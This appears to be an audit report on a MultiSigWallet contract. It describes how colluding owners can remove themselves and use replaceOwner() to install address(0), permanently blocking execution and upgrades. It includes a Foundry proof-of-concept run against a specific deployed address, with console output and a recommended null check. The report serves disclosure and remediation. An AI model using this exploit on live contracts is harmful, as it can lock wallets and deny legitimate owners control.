The vulnerability occurs due to removeOwner() and replaceOwner(). replaceOwner() allows replacing newOwner to be an address(0).
This is the removeOwner(address owner), which allows them to remove themselves. It also adjusting required = owners.length after removal of owner if required > owners.length.
Note: When required > owners.length, then required == owners.length. So future submitted transactions need 100% approvals from remaining owners inorder to get executed.
Note:replaceOwner(address owner, address newOwner) is requiring isOwner[owner] == true and isowner[newOwner] == false, using ownerExists and ownerDoesNotExist modifier. But its not checking for newOwner to be not null. So its allowing owner to replace itself with an address(0).
Attack could happens when atleast owners.length - required + 1 number of owners are malicious. In 4/6 multisig, 6 - 4 + 1 = 3 owners and 5/6, 6 - 5 + 1 = 2 owners only are required to be malicious, which is always less than required when required > owners.length / 2.
This is an attack scenario with 4/6 multisig:
owners.length - required number of owners can remove themselves using removeOwner(), to make required == owners.length i.e., 4 == 4.
One more owner can replace itself with null address, which still hold 4 == 4 but one of the owner is now null address and no one owns this null address.
So, even though all the remaining 3 owners confirmTransaction for all the future transactions(say they now want to change required = 3 using changeRequirement(uint _required) tx), condition to executeTransaction i.e., required == #confirmation (4 == 4 confirmations) can never be satisfied.
Since nothing can be upgraded, proxy have to be re-deployed with state migration from locked proxy to the new deployed proxy.
Some owners of the MultiSigWallet can bring the system in a state where future upgrade/any operation is impossible
We recommend to not allow any owner to get replaced with null address using replaceOwner(address owner, address newOwner) by adding a check notNull(newOwner).
// SPDX-License-Identifier: MITpragmasolidity >=0.7.0 <0.9.0;pragmaabicoder v2;import"forge-std/Test.sol";import {IERC20} from"forge-std/interfaces/IERC20.sol";interface IMultiSigWallet {functionowners(uint256) externalviewreturns (address);functionremoveOwner(address owner) external;functionisOwner(address) externalviewreturns (bool);functionconfirmations(uint256,address) externalviewreturns (bool);functiongetTransactionCount(bool pending,bool executed) externalviewreturns (uint256 count);functionisConfirmed(uint256 transactionId) externalviewreturns (bool);functiongetConfirmationCount(uint256 transactionId) externalviewreturns (uint256 count);functiontransactions(uint256) externalviewreturns (address destination,uint256 value,bytesmemory data,bool executed);functiongetOwners() externalviewreturns (address[] memory);functiongetTransactionIds(uint256 from,uint256 to,bool pending,bool executed ) externalviewreturns (uint256[] memory_transactionIds);functiongetConfirmations(uint256 transactionId)externalviewreturns (address[] memory_confirmations);functiontransactionCount() externalviewreturns (uint256);functionchangeRequirement(uint256_required) external;functionconfirmTransaction(uint256 transactionId) external;functionsubmitTransaction(address destination,uint256 value,bytesmemory data ) externalreturns (uint256 transactionId);functionrequired() externalviewreturns (uint256);functionreplaceOwner(address owner,address newOwner) external;functionexecuteTransaction(uint256 transactionId) external;fallback() externalpayable;receive() externalpayable;}contractPOCisTest { IMultiSigWallet c =IMultiSigWallet(payable(0x2028834B2c0A36A918c10937EeA71BE4f932da52));functionsetUp() public { vm.createSelectFork(""); }functiontestRemoveReplaceOwnersBlockingUpgradesPOC() public { address[] memory owners = c.getOwners(); console.log("Before remove, Owners:");for(uint i; i < owners.length; i++) { console.log("%d. %s", i, owners[i]); }uint required = c.required();uint initial_tx_id;for(uint i;i < owners.length - required; i++) { vm.startPrank(owners[i], owners[i]);uint _tx_id = c.submitTransaction(address(c),0, abi.encodeWithSignature("removeOwner(address)", owners[i])); console.log("Submitted tx with id : %d to remove owner : %s", _tx_id, owners[i]);if (i ==0) { initial_tx_id = _tx_id; } vm.stopPrank(); } console.log("Confirming transaction %d", initial_tx_id); vm.prank(owners[1]); c.confirmTransaction(initial_tx_id); vm.prank(owners[2]); c.confirmTransaction(initial_tx_id); vm.prank(owners[3]); c.confirmTransaction(initial_tx_id); console.log("Owner0 is removed"); console.log("Confirming transaction %d", initial_tx_id +1); vm.prank(owners[4]); c.confirmTransaction(initial_tx_id +1); vm.prank(owners[2]); c.confirmTransaction(initial_tx_id +1); vm.prank(owners[3]); c.confirmTransaction(initial_tx_id +1); console.log("Owner1 is removed"); console.log("prev required: %d", required); console.log("prev #owners : %d", owners.length); owners = c.getOwners();require(required == owners.length,"required is not equal to the number of owners"); console.log("After remove, Owners:");for(uint i; i < owners.length; i++) { console.log("%d. %s", i, owners[i]); } required = c.required(); console.log("new required: %d", required); console.log("new #owners : %d", owners.length); console.log("Replacing owner0 with address(0)"); vm.prank(owners[0], owners[0]);uint tx_id = c.submitTransaction(address(c),0, abi.encodeWithSignature("replaceOwner(address,address)", owners[0],address(0))); console.log("Submitted tx with id : %d to replace owner : %s with address zero", tx_id, owners[0]); console.log("Confirming tx with id : %d", tx_id);for(uint i =1; i < owners.length; i++) { vm.prank(owners[i], owners[i]); c.confirmTransaction(tx_id); } (,,,bool executed) = c.transactions(tx_id);require(executed,"!Executed"); owners = c.getOwners(); console.log("After replace, Owners:");for(uint i; i < owners.length; i++) { console.log("%d. %s", i, owners[i]); }bool isZeroAnOwner = c.isOwner(address(0)); console.log("ASSERTING: Is address(0) an owner: %s", isZeroAnOwner);require(isZeroAnOwner); console.log("Now remaining 3 valid owners tries to update requirement to 3");uint new_requirement =3; vm.prank(owners[1], owners[1]); tx_id = c.submitTransaction(address(c),0, abi.encodeWithSignature("changeRequirement(uint256)", new_requirement)); console.log("Submitted tx with id : %d to change requirement to %d", tx_id, new_requirement); console.log("Confirming tx with id : %d", tx_id);for(uint i; i < owners.length; i++) {if (owners[i] ==address(0) || i ==1) continue; // Since no one owns address(0) and owner1 already confirmed tx vm.prank(owners[i], owners[i]); c.confirmTransaction(tx_id); }bool isConfirmed = c.isConfirmed(tx_id); console.log("Is tx id : %d, confirmed? : %s", tx_id, isConfirmed);require(!isConfirmed,"Confirmed"); }}
Console Output:
Before remove, Owners: 0. 0xf5020ADf433645c451A4809eac0d6F680709f11B 1. 0xeD530f3b8675B0a576DaAe64C004676c65368DfD 2. 0xB7093FC2d926ADdE48122B70991fe68374879adf 3. 0xC715b8501039d3514787dC55BC09f89c293351e9 4. 0x6EF4e54E049A5FffB629063D3a9ee38ac27551C8 5. 0x3Cd51A933b0803DDCcDF985A7c71C1C7357FE9Eb Submitted tx with id : 5 to remove owner : 0xf5020ADf433645c451A4809eac0d6F680709f11B Submitted tx with id : 6 to remove owner : 0xeD530f3b8675B0a576DaAe64C004676c65368DfD Confirming transaction 5 Owner0 is removed Confirming transaction 6 Owner1 is removed prev required: 4 prev #owners : 6 After remove, Owners: 0. 0x3Cd51A933b0803DDCcDF985A7c71C1C7357FE9Eb 1. 0x6EF4e54E049A5FffB629063D3a9ee38ac27551C8 2. 0xB7093FC2d926ADdE48122B70991fe68374879adf 3. 0xC715b8501039d3514787dC55BC09f89c293351e9 new required: 4 new #owners : 4 Replacing owner0 with address(0) Submitted tx with id : 7 to replace owner : 0x3Cd51A933b0803DDCcDF985A7c71C1C7357FE9Eb with address zero Confirming tx with id : 7 After replace, Owners: 0. 0x0000000000000000000000000000000000000000 1. 0x6EF4e54E049A5FffB629063D3a9ee38ac27551C8 2. 0xB7093FC2d926ADdE48122B70991fe68374879adf 3. 0xC715b8501039d3514787dC55BC09f89c293351e9 ASSERTING: Is address(0) an owner: true Now remaining 3 valid owners tries to update requirement to 3 Submitted tx with id : 8 to change requirement to 3 Confirming tx with id : 8 Is tx id : 8, confirmed? : false